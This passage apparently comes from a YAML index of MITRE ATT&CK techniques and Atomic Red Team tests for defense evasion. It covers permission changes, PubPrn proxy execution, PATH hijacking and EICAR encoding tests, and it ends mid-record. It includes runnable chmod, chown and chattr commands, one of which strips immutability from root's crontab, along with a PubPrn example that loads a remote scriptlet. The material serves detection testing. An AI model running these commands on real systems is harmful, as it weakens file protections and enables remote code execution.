mode. 
' supported_platforms: - linux - macos input_arguments: symbolic_mode: description: Specified symbolic mode value type: string default: a+w file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chmod #{symbolic_mode} #{file_or_folder} ' name: sh - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. ' supported_platforms: - linux - macos input_arguments: numeric_mode: description: Specified numeric mode value type: integer default: 755 file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} ' name: sh - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. ' supported_platforms: - linux - macos input_arguments: symbolic_mode: description: Specified symbolic mode value type: string default: a+w file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} ' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. 
' supported_platforms: - macos - linux input_arguments: owner: description: Username of desired owner type: string default: root file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml" group: description: Group name of desired group type: string default: root executor: command: 'chown #{owner}:#{group} #{file_or_folder} ' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. ' supported_platforms: - macos - linux input_arguments: owner: description: Username of desired owner type: string default: root file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" group: description: Group name of desired group type: string default: root executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} ' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. ' supported_platforms: - linux - macos input_arguments: owner: description: Username of desired owner type: string default: root file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml" executor: command: 'chown #{owner} #{file_or_folder} ' name: sh - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. 
' supported_platforms: - macos - linux input_arguments: owner: description: Username of desired owner type: string default: root file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chown -R #{owner} #{file_or_folder} ' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f description: | Removes a file's `immutable` attribute using `chattr`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - macos - linux input_arguments: file_to_modify: description: Path of the file type: path default: "/var/spool/cron/root" executor: command: 'chattr -i #{file_to_modify} ' name: sh - name: Chmod through c script auto_generated_guid: 973631cf-6680-4ffa-a053-045e1b6b67ab description: 'chmods a file using a c script ' supported_platforms: - macos - linux input_arguments: source_file: description: Path of c source file type: path default: PathToAtomicsFolder/T1222.002/src/T1222.002.c compiled_file: description: Path of compiled file type: path default: "/tmp/T1222002" dependency_executor_name: sh dependencies: - description: 'Compile the script from (#{source_file}). Destination is #{compiled_file} ' prereq_command: 'gcc #{source_file} -o #{compiled_file} ' get_prereq_command: 'gcc #{source_file} -o #{compiled_file} ' executor: command: "#{compiled_file} /tmp/ T1222002\n" name: sh - name: Chown through c script auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389 description: 'chowns a file to root using a c script ' supported_platforms: - macos - linux input_arguments: source_file: description: Path of c source file type: path default: PathToAtomicsFolder/T1222.002/src/chown.c compiled_file: description: Path of compiled file type: path default: "/tmp/T1222002own" dependency_executor_name: sh dependencies: - description: 'Compile the script from (#{source_file}). 
Destination is #{compiled_file} ' prereq_command: 'gcc #{source_file} -o #{compiled_file} ' get_prereq_command: 'gcc #{source_file} -o #{compiled_file} ' executor: command: 'sudo #{compiled_file} #{source_file} ' name: sh elevation_required: true T1216.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58 created: '2020-02-03T16:49:57.788Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1216/001 external_id: T1216.001 - source_name: pubprn description: Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021. url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn - source_name: Enigma0x3 PubPrn Bypass description: 'Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.' url: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:22.022Z' name: 'Signed Script Proxy Execution: Pubprn' description: |- Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn) Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. 
An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Atul Nair, Qualys x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1216.001 atomic_tests: [] T1574.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 created: '2020-03-13T14:10:43.424Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/007 external_id: T1574.007 - source_name: Elastic Rules macOS launchctl 2022 description: Elastic Security 7.17. (2022, February 1). Modification of Environment Variable via Launchctl. Retrieved September 28, 2023. url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html - source_name: ExpressVPN PATH env Windows 2021 description: 'ExpressVPN Security Team. (2021, November 16). Cybersecurity lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.' 
url: https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/ - source_name: uptycs Fake POC linux malware 2023 description: 'Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit: Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.' url: https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware - source_name: nixCraft macOS PATH variables description: Vivek Gite. (2023, August 22). MacOS – Set / Change $PATH Variable Command. Retrieved September 28, 2023. url: https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:22.736Z' name: Path Interception by PATH Environment Variable description: "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. \n\nAdversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.\n\nFor example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. 
Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the `$PATH` variable to point to a directory to which they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Stefan Kanthak x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - macOS - Linux x_mitre_version: '1.2' atomic_tests: [] T1006: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5 created: '2017-05-31T21:30:20.934Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1006 external_id: T1006 - source_name: Github PowerSploit Ninjacopy 
description: Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016. url: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1 - source_name: Hakobyan 2009 description: Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014. url: http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin - source_name: LOLBAS Esentutl description: LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019. url: https://lolbas-project.github.io/lolbas/Binaries/Esentutl/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:23.015Z' name: Direct Volume Access description: |- Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. 
(Citation: Hakobyan 2009) Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Tom Simpson, CrowdStrike Falcon OverWatch x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices - Windows x_mitre_version: '2.3' identifier: T1006 atomic_tests: [] T1666: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e created: '2024-09-25T14:16:19.234Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1666 external_id: T1666 - source_name: AWS Organizations description: AWS. (n.d.). Terminology and concepts for AWS Organizations. Retrieved September 25, 2024. url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html - source_name: AWS RE:Inforce Threat Detection 2024 description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and techniques for proactive threat detection. Retrieved September 25, 2024. url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf - source_name: Microsoft Subscription Hijacking 2022 description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023. 
url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121 - source_name: Microsoft Azure Resources description: Microsoft Azure. (2024, May 31). Organize your Azure resources effectively. Retrieved September 25, 2024. url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources - source_name: Microsoft Peach Sandstorm 2023 description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved September 18, 2023. url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:49:45.874Z' name: Modify Cloud Resource Hierarchy description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses. \n\nIaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. 
This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.0' atomic_tests: [] T1564.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff created: '2021-06-07T13:20:23.767Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/008 external_id: T1564.008 - source_name: MacOS Email Rules description: Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021. url: https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac - source_name: Microsoft BEC Campaign description: 'Carr, N., Sellmer, S. (2021, June 14). 
Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.' url: https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/ - source_name: Microsoft Mail Flow Rules 2023 description: Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023. url: https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules - source_name: Microsoft Inbox Rules description: Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021. url: https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59 - source_name: Microsoft New-InboxRule description: Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021. url: https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps - source_name: Microsoft Set-InboxRule description: Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021. url: https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps - source_name: Microsoft Cloud App Security description: Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021. url: https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:23.364Z' name: 'Hide Artifacts: Email Hiding Rules' description: |- Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. 
Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule) Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account. Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair or delay detection that would otherwise have occurred had the email content been seen immediately by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security) In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then perform a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications). 
kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Dor Edry, Microsoft - Liran Ravich, CardinalOps x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - Linux - macOS - Office Suite x_mitre_version: '1.4' identifier: T1564.008 atomic_tests: [] T1027.013: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144 created: '2024-03-29T12:38:17.135Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/013 external_id: T1027.013 - source_name: File obfuscation description: Aspen Lindblom, Joseph Goodwin, and Chris Sheldon. (2021, July 19). Shlayer Malvertising Campaigns Still Using Flash Update Disguise. Retrieved March 29, 2024. url: https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/ - source_name: SFX - Encrypted/Encoded File description: Jai Minton. (2023, March 31). How Falcon OverWatch Investigates Malicious Self-Extracting Archives, Decoy Files and Their Hidden Payloads. Retrieved March 29, 2024. url: https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:05.840Z' name: 'Obfuscated Files or Information: Encrypted/Encoded File' description: "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. 
Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution." 
kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - David Galazin @themalwareman1 - Andrew Northern, @ex_raritas - Jai Minton, @Cyberraiju x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.1' identifier: T1027.013 atomic_tests: - name: Decode Eicar File and Write to File auto_generated_guid: 7693ccaa-8d64-4043-92a5-a2eb70359535 description: Decode the eicar value, and write it to file, for AV/EDR to try to catch. supported_platforms: - windows - macos - linux executor: command: |- $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=" $bytes = [System.Convert]::FromBase64String($encodedString) $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes) #write the decoded eicar string to file $decodedString | Out-File T1027.013_decodedEicar.txt cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file. name: powershell elevation_required: false - name: Decrypt Eicar File and Write to File auto_generated_guid: b404caaa-12ce-43c7-9214-62a531c044f7 description: Decrypt the eicar value, and write it to file, for AV/EDR to try to catch. 
supported_platforms: - windows - macos - linux executor: command: |- $encryptedString = "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" $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt)) #Write the decrypted eicar string to a file $decryptedString | out-file T1027.013_decryptedEicar.txt cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file. name: powershell elevation_required: false T1014: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b created: '2017-05-31T21:30:26.496Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1014 external_id: T1014 - source_name: CrowdStrike Linux Rootkit description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ - source_name: BlackHat Mac OSX Rootkit description: 'Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven''t known yet. Retrieved December 21, 2017.' url: http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf - source_name: Symantec Windows Rootkits description: Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017. url: https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf - source_name: Wikipedia Rootkit description: Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016. 
url: https://en.wikipedia.org/wiki/Rootkit object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:24.032Z' name: Rootkit description: "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)\n\nRootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system." kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Menachem Goldstein x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.3' identifier: T1014 atomic_tests: [] T1036.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e created: '2021-08-04T20:54:03.066Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/007 external_id: T1036.007 - source_name: SOCPrime DoubleExtension description: 'Eugene Tkachenko. (2020, May 1). 
Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.' url: https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/ - source_name: PCMag DoubleExtension description: 'PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.' url: https://www.pcmag.com/encyclopedia/term/double-extension - source_name: Seqrite DoubleExtension description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021. url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:25.732Z' name: 'Masquerading: Double File Extension' description: "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). 
For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type." kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.0' identifier: T1036.007 atomic_tests: [] T1548.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 created: '2020-01-30T14:24:34.977Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548/002 external_id: T1548.002 - source_name: Davidson Windows description: Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014. url: 